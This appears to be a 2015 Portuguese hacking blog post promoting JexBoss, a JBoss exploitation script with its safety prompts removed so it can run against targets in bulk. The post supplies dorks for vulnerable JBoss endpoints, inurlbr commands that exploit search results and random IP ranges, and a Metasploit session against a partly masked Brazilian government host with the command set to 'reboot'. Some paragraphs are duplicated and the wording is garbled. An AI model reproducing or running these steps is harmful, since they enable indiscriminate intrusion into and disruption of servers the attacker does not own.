Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Remote Command Execution. Mostrar todas as postagens
Mostrando postagens com marcador Remote Command Execution. Mostrar todas as postagens

sexta-feira, 19 de junho de 2015

JexBoss - Jboss Verify Tool - INURLBR Mass exploitation -

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner  All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites.

Requirements
Python <= 2.7.x

Installation
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

#  [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates: https://github.com/joaomatosf/jexboss
#  [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

  1. /jmx-console - tested and working in JBoss versions 4, 5 and 6
  2. /web-console/Invoker- tested and working in JBoss versions 4
  3. /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5

The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner 
All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.

Mass Exploration: 
To do this we use the scanner inurlbr
Modified script for mass exploitation: 
https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py 

DORKS SEARCH 

inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"

COMMAND INURLBR:
- single search.
--dork {YOU_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

- search using dorks file 
- File example with dorks:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"
site:uk  inurl:"/web-console/Invoker"
site:ru  inurl:"/web-console/Invoker"
site:us  inurl:"/web-console/Invoker"
site:com  inurl:"/web-console/Invoker"
So on .....

Exemple-> File: dorks.txt
--dork-file {YOU_DORKFILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"


- Using to capture the range of ips--range {IP_START,IP_END}

php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
- Range of ips random--range-rand {counter}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

Exemple OUTPUT:


JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
  • MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
  • COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
  • DORK:site:.gov.br inurl:.seam  intitle:"JBoss Seam Debug"
Configuração:
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit

Output:
msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam msf auxiliary(jboss_seam_exec) > exploit

Resultado:

Resultado: